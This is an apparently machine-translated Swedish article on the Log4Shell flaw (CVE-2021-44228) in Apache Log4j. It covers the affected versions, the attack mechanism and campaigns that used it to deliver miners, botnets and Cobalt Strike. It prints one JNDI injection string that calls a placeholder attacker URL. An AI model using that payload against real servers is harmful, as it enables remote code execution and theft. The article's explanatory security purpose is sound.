Log4Shell Vulnerability

Den 10 december 2021 släpptes en exploatering för en kritisk sårbarhet i Apache Log4j Java-baserade loggningsplattformoffentligt. Spårad som CVE-2021-44228 eller Log4Shell, påverkar sårbarheten Log4j-versioner från Log4j 2.0-beta9 och upp till 2.14.1. Hotaktörer kan dra fördel av utnyttjandet för att etablera oautentiserad fjärråtkomst, exekvera kod, leverera skadliga hot eller samla in information. Sårbarheten tilldelas en kritisk status eftersom Log4j används flitigt av företagsapplikationer och molntjänster.

Log4Shell tekniska detaljer

Exploateringen börjar med att hotaktören ändrar sin webbläsares användaragent. Sedan besöker de en webbplats eller söker efter en specifik sträng som finns på webbplatser med formatet:

${jndi:ldap://[attacker_URL]}

Som ett resultat kommer strängen att läggas till i webbserverns åtkomstloggar. Angriparna väntar sedan på att Log4j-applikationen ska analysera dessa loggar och nå den bifogade strängen. I det här fallet kommer buggen att utlösas, vilket gör att servern ringer tillbaka till URL:en som finns i JNDI-strängen. Den webbadressen missbrukas för att hantera Base64-kodade kommandon eller Java-klasserdärefter och kör dem på den komprometterade enheten.

Apache släppte snabbt en ny version - Log4j 2.15.0, för att åtgärda och åtgärda exploateringen, men en betydande mängd sårbara system kunde förbli oparpade under en lång period. Samtidigt lade hotaktörer snabbt märke till Log4Shell nolldagarssårbarheten och började skanna efter lämpliga servrar att utnyttja. Infosec-communityt har spårat många attackkampanjer som använder Log4Shell för att leverera ett brett utbud av skadliga hot.

Log4Shell används i Cryptominer, Botnet, Backdoor och datainsamlingsattacker

En av de första hotaktörerna som implementerade Log4Shell i sin verksamhet var cyberbrottslingarna bakom Kinsings kryptomining -botnät. Hackarna använde Log4Shell för att leverera Base64-kodade nyttolaster och köra skalskript. Rollen för dessa skript är att rensa det riktade systemet från konkurrerande kryptomininghot innan deras egen Kinsing skadlig kod exekveras.

Netlab 360 upptäckte hotaktörer som använde sårbarheten för att installera versioner av Mirai- och Muhstik- botnäten på de brutna enheterna. Dessa skadliga hot är utformade för att lägga till infekterade system i ett nätverk av IoT-enheter och servrar, som angriparna sedan kan instruera att starta DDoS-attacker (Distributed Denial-of-Service) eller distribuera kryptominerssenare.

Enligt Microsoft Threat Intelligence Center, var Log4j-utnyttjandet också mål för attackkampanjer som släppte Cobalt Strike-fyrar. Cobalt Strike är ett legitimt mjukvaruverktyg som används för penetrationstestning mot ett företags säkerhetssystem.Dess bakdörrskapacitet har dock gjort det till en vanlig del av arsenalen av många hotaktörsgrupper. Efteråt används den illegala bakdörrsåtkomsten till offrets nätverk för att leverera nyttolaster i nästa steg som ransomware, info-stöldare och andra skadliga hot.

Log4Shell kan utnyttjas för att förvärva miljövariabler som innehåller serverdata. På så sätt kan angripare få tillgång till värdens namn, OS-namn, OS-versionsnummer, användarnamn som Log4j-tjänsten körs under och mer.